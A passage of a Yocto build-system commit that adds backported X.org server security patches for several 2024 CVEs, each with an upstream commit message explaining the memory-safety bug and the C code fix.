41@@ -784,8 +784,9 @@ DeviceFocusEvent(DeviceIntPtr dev, int type, int mode, int detail,
42
43 mouse = IsFloating(dev) ? dev : GetMaster(dev, MASTER_POINTER);
44
45- /* XI 2 event */
46- btlen = (mouse->button) ? bits_to_bytes(mouse->button->numButtons) : 0;
47+ /* XI 2 event contains the logical button map - maps are CARD8
48+ * so we need 256 bits for the possibly maximum mapping */
49+ btlen = (mouse->button) ? bits_to_bytes(256) : 0;
50 btlen = bytes_to_int32(btlen);
51 len = sizeof(xXIFocusInEvent) + btlen * 4;
52
53--
54GitLab
55
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
new file mode 100644
index 0000000000..80ebc64e59
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
@@ -0,0 +1,87 @@
1From ece23be888a93b741aa1209d1dbf64636109d6a5 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Mon, 18 Dec 2023 14:27:50 +1000
4Subject: [PATCH] dix: Allocate sufficient xEvents for our DeviceStateNotify
5
6If a device has both a button class and a key class and numButtons is
7zero, we can get an OOB write due to event under-allocation.
8
9This function seems to assume a device has either keys or buttons, not
10both. It has two virtually identical code paths, both of which assume
11they're applying to the first event in the sequence.
12
13A device with both a key and button class triggered a logic bug - only
14one xEvent was allocated but the deviceStateNotify pointer was pushed on
15once per type. So effectively this logic code:
16
17 int count = 1;
18 if (button && nbuttons > 32) count++;
19 if (key && nbuttons > 0) count++;
20 if (key && nkeys > 32) count++; // this is basically always true
21 // count is at 2 for our keys + zero button device
22
23 ev = alloc(count * sizeof(xEvent));
24 FixDeviceStateNotify(ev);
25 if (button)
26 FixDeviceStateNotify(ev++);
27 if (key)
28 FixDeviceStateNotify(ev++); // santa drops into the wrong chimney here
29
30If the device has more than 3 valuators, the OOB is pushed back - we're
31off by one so it will happen when the last deviceValuator event is
32written instead.
33
34Fix this by allocating the maximum number of events we may allocate.
35Note that the current behavior is not protocol-correct anyway, this
36patch fixes only the allocation issue.
37
38Note that this issue does not trigger if the device has at least one
39button. While the server does not prevent a button class with zero
40buttons, it is very unlikely.
41
42CVE-2024-0229, ZDI-CAN-22678
43
44This vulnerability was discovered by:
45Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
46
47Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ece23be888a93b741aa1209d1dbf64636109d6a5]
48CVE: CVE-2024-0229
49Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
50---
51 dix/enterleave.c | 6 +++---
52 1 file changed, 3 insertions(+), 3 deletions(-)
53
54diff --git a/dix/enterleave.c b/dix/enterleave.c
55index ded8679d76..17964b00a4 100644
56--- a/dix/enterleave.c
57+++ b/dix/enterleave.c
58@@ -675,7 +675,8 @@ static void
59 DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
60 {
61 int evcount = 1;
62- deviceStateNotify *ev, *sev;
63+ deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
64+ deviceStateNotify *ev;
65 deviceKeyStateNotify *kev;
66 deviceButtonStateNotify *bev;
67
68@@ -714,7 +715,7 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
69 }
70 }
71
72- sev = ev = xallocarray(evcount, sizeof(xEvent));
73+ ev = sev;
74 FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
75
76 if (b != NULL) {
77@@ -770,7 +771,6 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
78
79 DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
80 DeviceStateNotifyMask, NullGrab);
81- free(sev);
82 }
83
84 void
85--
86GitLab
87
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
new file mode 100644
index 0000000000..65df74376b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
@@ -0,0 +1,221 @@
1From 219c54b8a3337456ce5270ded6a67bcde53553d5 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Mon, 18 Dec 2023 12:26:20 +1000
4Subject: [PATCH] dix: fix DeviceStateNotify event calculation
5
6The previous code only made sense if one considers buttons and keys to
7be mutually exclusive on a device. That is not necessarily true, causing
8a number of issues.
9
10This function allocates and fills in the number of xEvents we need to
11send the device state down the wire. This is split across multiple
1232-byte devices including one deviceStateNotify event and optional
13deviceKeyStateNotify, deviceButtonStateNotify and (possibly multiple)
14deviceValuator events.
15
16The previous behavior would instead compose a sequence
17of [state, buttonstate, state, keystate, valuator...]. This is not
18protocol correct, and on top of that made the code extremely convoluted.
19
20Fix this by streamlining: add both button and key into the deviceStateNotify
21and then append the key state and button state, followed by the
22valuators. Finally, the deviceValuator events contain up to 6 valuators
23per event but we only ever sent through 3 at a time. Let's double that
24troughput.
25
26CVE-2024-0229, ZDI-CAN-22678
27
28This vulnerability was discovered by:
29Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
30
31Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/219c54b8a3337456ce5270ded6a67bcde53553d5]
32CVE: CVE-2024-0229
33Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
34---
35 dix/enterleave.c | 121 ++++++++++++++++++++---------------------------
36 1 file changed, 52 insertions(+), 69 deletions(-)
37
38diff --git a/dix/enterleave.c b/dix/enterleave.c
39index 17964b00a4..7b7ba1098b 100644
40--- a/dix/enterleave.c
41+++ b/dix/enterleave.c
42@@ -615,9 +615,15 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
43
44 ev->type = DeviceValuator;
45 ev->deviceid = dev->id;
46- ev->num_valuators = nval < 3 ? nval : 3;
47+ ev->num_valuators = nval < 6 ? nval : 6;
48 ev->first_valuator = first;
49 switch (ev->num_valuators) {
50+ case 6:
51+ ev->valuator2 = v->axisVal[first + 5];
52+ case 5:
53+ ev->valuator2 = v->axisVal[first + 4];
54+ case 4:
55+ ev->valuator2 = v->axisVal[first + 3];
56 case 3:
57 ev->valuator2 = v->axisVal[first + 2];
58 case 2:
59@@ -626,7 +632,6 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
60 ev->valuator0 = v->axisVal[first];
61 break;
62 }
63- first += ev->num_valuators;
64 }
65
66 static void
67@@ -646,7 +651,7 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
68 ev->num_buttons = b->numButtons;
69 memcpy((char *) ev->buttons, (char *) b->down, 4);
70 }
71- else if (k) {
72+ if (k) {
73 ev->classes_reported |= (1 << KeyClass);
74 ev->num_keys = k->xkbInfo->desc->max_key_code -
75 k->xkbInfo->desc->min_key_code;
76@@ -670,15 +675,26 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
77 }
78 }
79
80-
81+/**
82+ * The device state notify event is split across multiple 32-byte events.
83+ * The first one contains the first 32 button state bits, the first 32
84+ * key state bits, and the first 3 valuator values.
85+ *
86+ * If a device has more than that, the server sends out:
87+ * - one deviceButtonStateNotify for buttons 32 and above
88+ * - one deviceKeyStateNotify for keys 32 and above
89+ * - one deviceValuator event per 6 valuators above valuator 4
90+ *
91+ * All events but the last one have the deviceid binary ORed with MORE_EVENTS,
92+ */
93 static void
94 DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
95 {
96+ /* deviceStateNotify, deviceKeyStateNotify, deviceButtonStateNotify
97+ * and one deviceValuator for each 6 valuators */
98+ deviceStateNotify sev[3 + (MAX_VALUATORS + 6)/6];
99 int evcount = 1;
100- deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
101- deviceStateNotify *ev;
102- deviceKeyStateNotify *kev;
103- deviceButtonStateNotify *bev;
104+ deviceStateNotify *ev = sev;
105
106 KeyClassPtr k;
107 ButtonClassPtr b;
108@@ -691,82 +707,49 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
109
110 if ((b = dev->button) != NULL) {
111 nbuttons = b->numButtons;
112- if (nbuttons > 32)
113+ if (nbuttons > 32) /* first 32 are encoded in deviceStateNotify */
114 evcount++;
115 }
116 if ((k = dev->key) != NULL) {
117 nkeys = k->xkbInfo->desc->max_key_code - k->xkbInfo->desc->min_key_code;
118- if (nkeys > 32)
119+ if (nkeys > 32) /* first 32 are encoded in deviceStateNotify */
120 evcount++;
121- if (nbuttons > 0) {
122- evcount++;
123- }
124 }
125 if ((v = dev->valuator) != NULL) {
126 nval = v->numAxes;
127-
128- if (nval > 3)
129- evcount++;
130- if (nval > 6) {
131- if (!(k && b))
132- evcount++;
133- if (nval > 9)
134- evcount += ((nval - 7) / 3);
135- }
136+ /* first three are encoded in deviceStateNotify, then
137+ * it's 6 per deviceValuator event */
138+ evcount += ((nval - 3) + 6)/6;
139 }
140
141- ev = sev;
142- FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
143-
144- if (b != NULL) {
145- FixDeviceStateNotify(dev, ev++, NULL, b, v, first);
146- first += 3;
147- nval -= 3;
148- if (nbuttons > 32) {
149- (ev - 1)->deviceid |= MORE_EVENTS;
150- bev = (deviceButtonStateNotify *) ev++;
151- bev->type = DeviceButtonStateNotify;
152- bev->deviceid = dev->id;
153- memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
154- DOWN_LENGTH - 4);
155- }
156- if (nval > 0) {
157- (ev - 1)->deviceid |= MORE_EVENTS;
158- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
159- first += 3;
160- nval -= 3;
161- }
162+ BUG_RETURN(evcount <= ARRAY_SIZE(sev));
163+
164+ FixDeviceStateNotify(dev, ev, k, b, v, first);
165+
166+ if (b != NULL && nbuttons > 32) {
167+ deviceButtonStateNotify *bev = (deviceButtonStateNotify *) ++ev;
168+ (ev - 1)->deviceid |= MORE_EVENTS;
169+ bev->type = DeviceButtonStateNotify;
170+ bev->deviceid = dev->id;
171+ memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
172+ DOWN_LENGTH - 4);
173 }
174
175- if (k != NULL) {
176- FixDeviceStateNotify(dev, ev++, k, NULL, v, first);
177- first += 3;
178- nval -= 3;
179- if (nkeys > 32) {
180- (ev - 1)->deviceid |= MORE_EVENTS;
181- kev = (deviceKeyStateNotify *) ev++;
182- kev->type = DeviceKeyStateNotify;
183- kev->deviceid = dev->id;
184- memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
185- }
186- if (nval > 0) {
187- (ev - 1)->deviceid |= MORE_EVENTS;
188- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
189- first += 3;
190- nval -= 3;
191- }
192+ if (k != NULL && nkeys > 32) {
193+ deviceKeyStateNotify *kev = (deviceKeyStateNotify *) ++ev;
194+ (ev - 1)->deviceid |= MORE_EVENTS;
195+ kev->type = DeviceKeyStateNotify;
196+ kev->deviceid = dev->id;
197+ memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
198 }
199
200+ first = 3;
201+ nval -= 3;
202 while (nval > 0) {
203- FixDeviceStateNotify(dev, ev++, NULL, NULL, v, first);
204- first += 3;
205- nval -= 3;
206- if (nval > 0) {
207- (ev - 1)->deviceid |= MORE_EVENTS;
208- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
209- first += 3;
210- nval -= 3;
211- }
212+ ev->deviceid |= MORE_EVENTS;
213+ FixDeviceValuator(dev, (deviceValuator *) ++ev, v, first);
214+ first += 6;
215+ nval -= 6;
216 }
217
218 DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
219--
220GitLab
221
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
new file mode 100644
index 0000000000..742c122fa8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
@@ -0,0 +1,41 @@
1From df3c65706eb169d5938df0052059f3e0d5981b74 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Thu, 21 Dec 2023 13:48:10 +1000
4Subject: [PATCH] Xi: when creating a new ButtonClass, set the number of
5 buttons
6
7There's a racy sequence where a master device may copy the button class
8from the slave, without ever initializing numButtons. This leads to a
9device with zero buttons but a button class which is invalid.
10
11Let's copy the numButtons value from the source - by definition if we
12don't have a button class yet we do not have any other slave devices
13with more than this number of buttons anyway.
14
15CVE-2024-0229, ZDI-CAN-22678
16
17This vulnerability was discovered by:
18Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
19
20Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/df3c65706eb169d5938df0052059f3e0d5981b74]
21CVE: CVE-2024-0229
22Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
23---
24 Xi/exevents.c | 1 +
25 1 file changed, 1 insertion(+)
26
27diff --git a/Xi/exevents.c b/Xi/exevents.c
28index 54ea11a938..e161714682 100644
29--- a/Xi/exevents.c
30+++ b/Xi/exevents.c
31@@ -605,6 +605,7 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
32 to->button = calloc(1, sizeof(ButtonClassRec));
33 if (!to->button)
34 FatalError("[Xi] no memory for class shift.\n");
35+ to->button->numButtons = from->button->numButtons;
36 }
37 else
38 classes->button = NULL;
39--
40GitLab
41
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
new file mode 100644
index 0000000000..d1a6214793
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
@@ -0,0 +1,45 @@
1From 37539cb0bfe4ed96d4499bf371e6b1a474a740fe Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Thu, 21 Dec 2023 14:10:11 +1000
4Subject: [PATCH] Xi: require a pointer and keyboard device for
5 XIAttachToMaster
6
7If we remove a master device and specify which other master devices
8attached slaves should be returned to, enforce that those two are
9indeeed a pointer and a keyboard.
10
11Otherwise we can try to attach the keyboards to pointers and vice versa,
12leading to possible crashes later.
13
14Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/37539cb0bfe4ed96d4499bf371e6b1a474a740fe]
15CVE: CVE-2024-0229
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 Xi/xichangehierarchy.c | 4 ++--
19 1 file changed, 2 insertions(+), 2 deletions(-)
20
21diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
22index 504defe566..d2d985848d 100644
23--- a/Xi/xichangehierarchy.c
24+++ b/Xi/xichangehierarchy.c
25@@ -270,7 +270,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
26 if (rc != Success)
27 goto unwind;
28
29- if (!IsMaster(newptr)) {
30+ if (!IsMaster(newptr) || !IsPointerDevice(newptr)) {
31 client->errorValue = r->return_pointer;
32 rc = BadDevice;
33 goto unwind;
34@@ -281,7 +281,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
35 if (rc != Success)
36 goto unwind;
37
38- if (!IsMaster(newkeybd)) {
39+ if (!IsMaster(newkeybd) || !IsKeyboardDevice(newkeybd)) {
40 client->errorValue = r->return_keyboard;
41 rc = BadDevice;
42 goto unwind;
43--
44GitLab
45
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
new file mode 100644
index 0000000000..c8f75d8a7e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
@@ -0,0 +1,64 @@
1From e5e8586a12a3ec915673edffa10dc8fe5e15dac3 Mon Sep 17 00:00:00 2001
2From: Olivier Fourdan <ofourdan@redhat.com>
3Date: Wed, 6 Dec 2023 12:09:41 +0100
4Subject: [PATCH] glx: Call XACE hooks on the GLX buffer
5
6The XSELINUX code will label resources at creation by checking the
7access mode. When the access mode is DixCreateAccess, it will call the
8function to label the new resource SELinuxLabelResource().
9
10However, GLX buffers do not go through the XACE hooks when created,
11hence leaving the resource actually unlabeled.
12
13When, later, the client tries to create another resource using that
14drawable (like a GC for example), the XSELINUX code would try to use
15the security ID of that object which has never been labeled, get a NULL
16pointer and crash when checking whether the requested permissions are
17granted for subject security ID.
18
19To avoid the issue, make sure to call the XACE hooks when creating the
20GLX buffers.
21
22Credit goes to Donn Seeley <donn@xmission.com> for providing the patch.
23
24CVE-2024-0408
25
26Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
27Acked-by: Peter Hutterer <peter.hutterer@who-t.net>
28
29Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/e5e8586a12a3ec915673edffa10dc8fe5e15dac3]
30CVE: CVE-2024-0408
31Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
32---
33 glx/glxcmds.c | 8 ++++++++
34 1 file changed, 8 insertions(+)
35
36diff --git a/glx/glxcmds.c b/glx/glxcmds.c
37index fc26a2e345..1e46d0c723 100644
38--- a/glx/glxcmds.c
39+++ b/glx/glxcmds.c
40@@ -48,6 +48,7 @@
41 #include "indirect_util.h"
42 #include "protocol-versions.h"
43 #include "glxvndabi.h"
44+#include "xace.h"
45
46 static char GLXServerVendorName[] = "SGI";
47
48@@ -1392,6 +1393,13 @@ DoCreatePbuffer(ClientPtr client, int screenNum, XID fbconfigId,
49 if (!pPixmap)
50 return BadAlloc;
51
52+ err = XaceHook(XACE_RESOURCE_ACCESS, client, glxDrawableId, RT_PIXMAP,
53+ pPixmap, RT_NONE, NULL, DixCreateAccess);
54+ if (err != Success) {
55+ (*pGlxScreen->pScreen->DestroyPixmap) (pPixmap);
56+ return err;
57+ }
58+
59 /* Assign the pixmap the same id as the pbuffer and add it as a
60 * resource so it and the DRI2 drawable will be reclaimed when the
61 * pbuffer is destroyed. */
62--
63GitLab
64
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
new file mode 100644
index 0000000000..9763e0b562
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
@@ -0,0 +1,46 @@
1From 2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7 Mon Sep 17 00:00:00 2001
2From: Olivier Fourdan <ofourdan@redhat.com>
3Date: Wed, 6 Dec 2023 11:51:56 +0100
4Subject: [PATCH] ephyr,xwayland: Use the proper private key for cursor
5
6The cursor in DIX is actually split in two parts, the cursor itself and
7the cursor bits, each with their own devPrivates.
8
9The cursor itself includes the cursor bits, meaning that the cursor bits
10devPrivates in within structure of the cursor.
11
12Both Xephyr and Xwayland were using the private key for the cursor bits
13to store the data for the cursor, and when using XSELINUX which comes
14with its own special devPrivates, the data stored in that cursor bits'
15devPrivates would interfere with the XSELINUX devPrivates data and the
16SELINUX security ID would point to some other unrelated data, causing a
17crash in the XSELINUX code when trying to (re)use the security ID.
18
19CVE-2024-0409
20
21Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
22Reviewed-by: Peter Hutterer <peter.hutterer@who-t.net>
23
24Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7]
25CVE: CVE-2024-0409
26Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
27---
28 hw/kdrive/ephyr/ephyrcursor.c | 2 +-
29 1 file changed, 1 insertion(+), 1 deletion(-)
30
31diff --git a/hw/kdrive/ephyr/ephyrcursor.c b/hw/kdrive/ephyr/ephyrcursor.c
32index f991899..3f192d0 100644
33--- a/hw/kdrive/ephyr/ephyrcursor.c
34+++ b/hw/kdrive/ephyr/ephyrcursor.c
35@@ -246,7 +246,7 @@ miPointerSpriteFuncRec EphyrPointerSpriteFuncs = {
36 Bool
37 ephyrCursorInit(ScreenPtr screen)
38 {
39- if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR_BITS,
40+ if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR,
41 sizeof(ephyrCursorRec)))
42 return FALSE;
43
44--
452.25.1
46
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
new file mode 100644
index 0000000000..7c8fbcc3ec
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
@@ -0,0 +1,113 @@
1From 4a5e9b1895627d40d26045bd0b7ef3dce503cbd1 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Thu, 4 Jan 2024 10:01:24 +1000
4Subject: [PATCH] Xi: flush hierarchy events after adding/removing master
5 devices
6
7The `XISendDeviceHierarchyEvent()` function allocates space to store up
8to `MAXDEVICES` (256) `xXIHierarchyInfo` structures in `info`.
9
10If a device with a given ID was removed and a new device with the same
11ID added both in the same operation, the single device ID will lead to
12two info structures being written to `info`.
13
14Since this case can occur for every device ID at once, a total of two
15times `MAXDEVICES` info structures might be written to the allocation.
16
17To avoid it, once one add/remove master is processed, send out the
18device hierarchy event for the current state and continue. That event
19thus only ever has exactly one of either added/removed in it (and
20optionally slave attached/detached).
21
22CVE-2024-21885, ZDI-CAN-22744
23
24This vulnerability was discovered by:
25Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
26
27Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/4a5e9b1895627d40d26045bd0b7ef3dce503cbd1]
28CVE: CVE-2024-21885
29Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
30---
31 Xi/xichangehierarchy.c | 27 ++++++++++++++++++++++-----
32 1 file changed, 22 insertions(+), 5 deletions(-)
33
34diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
35index d2d985848d..72d00451e3 100644
36--- a/Xi/xichangehierarchy.c
37+++ b/Xi/xichangehierarchy.c
38@@ -416,6 +416,11 @@ ProcXIChangeHierarchy(ClientPtr client)
39 size_t len; /* length of data remaining in request */
40 int rc = Success;
41 int flags[MAXDEVICES] = { 0 };
42+ enum {
43+ NO_CHANGE,
44+ FLUSH,
45+ CHANGED,
46+ } changes = NO_CHANGE;
47
48 REQUEST(xXIChangeHierarchyReq);
49 REQUEST_AT_LEAST_SIZE(xXIChangeHierarchyReq);
50@@ -465,8 +470,9 @@ ProcXIChangeHierarchy(ClientPtr client)
51 rc = add_master(client, c, flags);
52 if (rc != Success)
53 goto unwind;
54- }
55+ changes = FLUSH;
56 break;
57+ }
58 case XIRemoveMaster:
59 {
60 xXIRemoveMasterInfo *r = (xXIRemoveMasterInfo *) any;
61@@ -475,8 +481,9 @@ ProcXIChangeHierarchy(ClientPtr client)
62 rc = remove_master(client, r, flags);
63 if (rc != Success)
64 goto unwind;
65- }
66+ changes = FLUSH;
67 break;
68+ }
69 case XIDetachSlave:
70 {
71 xXIDetachSlaveInfo *c = (xXIDetachSlaveInfo *) any;
72@@ -485,8 +492,9 @@ ProcXIChangeHierarchy(ClientPtr client)
73 rc = detach_slave(client, c, flags);
74 if (rc != Success)
75 goto unwind;
76- }
77+ changes = CHANGED;
78 break;
79+ }
80 case XIAttachSlave:
81 {
82 xXIAttachSlaveInfo *c = (xXIAttachSlaveInfo *) any;
83@@ -495,16 +503,25 @@ ProcXIChangeHierarchy(ClientPtr client)
84 rc = attach_slave(client, c, flags);
85 if (rc != Success)
86 goto unwind;
87+ changes = CHANGED;
88+ break;
89 }
90+ default:
91 break;
92 }
93
94+ if (changes == FLUSH) {
95+ XISendDeviceHierarchyEvent(flags);
96+ memset(flags, 0, sizeof(flags));
97+ changes = NO_CHANGE;
98+ }
99+
100 len -= any->length * 4;
101 any = (xXIAnyHierarchyChangeInfo *) ((char *) any + any->length * 4);
102 }
103
104 unwind:
105-
106- XISendDeviceHierarchyEvent(flags);
107+ if (changes != NO_CHANGE)
108+ XISendDeviceHierarchyEvent(flags);
109 return rc;
110 }
111--
112GitLab
113
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
new file mode 100644
index 0000000000..1e1c782963
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
@@ -0,0 +1,74 @@
1From bc1fdbe46559dd947674375946bbef54dd0ce36b Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Jos=C3=A9=20Exp=C3=B3sito?= <jexposit@redhat.com>
3Date: Fri, 22 Dec 2023 18:28:31 +0100
4Subject: [PATCH] Xi: do not keep linked list pointer during recursion
5
6The `DisableDevice()` function is called whenever an enabled device
7is disabled and it moves the device from the `inputInfo.devices` linked
8list to the `inputInfo.off_devices` linked list.
9
10However, its link/unlink operation has an issue during the recursive
11call to `DisableDevice()` due to the `prev` pointer pointing to a
12removed device.
13
14This issue leads to a length mismatch between the total number of
15devices and the number of device in the list, leading to a heap
16overflow and, possibly, to local privilege escalation.
17
18Simplify the code that checked whether the device passed to
19`DisableDevice()` was in `inputInfo.devices` or not and find the
20previous device after the recursion.
21
22CVE-2024-21886, ZDI-CAN-22840
23
24This vulnerability was discovered by:
25Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
26
27Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/bc1fdbe46559dd947674375946bbef54dd0ce36b]
28CVE: CVE-2024-21886
29Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
30---
31 dix/devices.c | 15 ++++++++++++---
32 1 file changed, 12 insertions(+), 3 deletions(-)
33
34diff --git a/dix/devices.c b/dix/devices.c
35index dca98c8d1b..389d28a23c 100644
36--- a/dix/devices.c
37+++ b/dix/devices.c
38@@ -453,14 +453,20 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
39 {
40 DeviceIntPtr *prev, other;
41 BOOL enabled;
42+ BOOL dev_in_devices_list = FALSE;
43 int flags[MAXDEVICES] = { 0 };
44
45 if (!dev->enabled)
46 return TRUE;
47
48- for (prev = &inputInfo.devices;
49- *prev && (*prev != dev); prev = &(*prev)->next);
50- if (*prev != dev)
51+ for (other = inputInfo.devices; other; other = other->next) {
52+ if (other == dev) {
53+ dev_in_devices_list = TRUE;
54+ break;
55+ }
56+ }
57+
58+ if (!dev_in_devices_list)
59 return FALSE;
60
61 TouchEndPhysicallyActiveTouches(dev);
62@@ -511,6 +517,9 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
63 LeaveWindow(dev);
64 SetFocusOut(dev);
65
66+ for (prev = &inputInfo.devices;
67+ *prev && (*prev != dev); prev = &(*prev)->next);
68+
69 *prev = dev->next;
70 dev->next = inputInfo.off_devices;
71 inputInfo.off_devices = dev;
72--
73GitLab
74
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
new file mode 100644
index 0000000000..af607df4f0
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
@@ -0,0 +1,57 @@
1From 26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Fri, 5 Jan 2024 09:40:27 +1000
4Subject: [PATCH] dix: when disabling a master, float disabled slaved devices
5 too
6
7Disabling a master device floats all slave devices but we didn't do this
8to already-disabled slave devices. As a result those devices kept their
9reference to the master device resulting in access to already freed
10memory if the master device was removed before the corresponding slave
11device.
12
13And to match this behavior, also forcibly reset that pointer during
14CloseDownDevices().
15
16Related to CVE-2024-21886, ZDI-CAN-22840
17
18Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8]
19CVE: CVE-2024-21886
20Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
21---
22 dix/devices.c | 12 ++++++++++++
23 1 file changed, 12 insertions(+)
24
25diff --git a/dix/devices.c b/dix/devices.c
26index 389d28a23c..84a6406d13 100644
27--- a/dix/devices.c
28+++ b/dix/devices.c
29@@ -483,6 +483,13 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
30 flags[other->id] |= XISlaveDetached;
31 }
32 }
33+
34+ for (other = inputInfo.off_devices; other; other = other->next) {
35+ if (!IsMaster(other) && GetMaster(other, MASTER_ATTACHED) == dev) {
36+ AttachDevice(NULL, other, NULL);
37+ flags[other->id] |= XISlaveDetached;
38+ }
39+ }
40 }
41 else {
42 for (other = inputInfo.devices; other; other = other->next) {
43@@ -1088,6 +1095,11 @@ CloseDownDevices(void)
44 dev->master = NULL;
45 }
46
47+ for (dev = inputInfo.off_devices; dev; dev = dev->next) {
48+ if (!IsMaster(dev) && !IsFloating(dev))
49+ dev->master = NULL;
50+ }
51+
